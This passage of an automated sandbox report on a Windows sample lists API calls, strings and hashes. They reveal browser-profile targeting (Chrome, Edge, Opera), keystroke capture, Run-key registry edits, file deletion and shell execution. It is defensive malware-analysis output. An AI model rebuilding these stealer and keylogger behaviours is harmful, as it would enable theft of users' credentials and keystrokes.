                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                • Opcode ID: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                • Opcode Fuzzy Hash: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                • API String ID: 2086374402-949981407
                                • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___initconout.LIBCMT ref: 0045555B
                                  • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleCreateFileWrite___initconout
                                • String ID: PkGNG
                                • API String ID: 3087715906-263838557
                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                • Opcode Fuzzy Hash: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF
                                • API String ID: 3325800564-665520524
                                • Opcode ID: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                Uniqueness

                                Uniqueness Score: -1.00%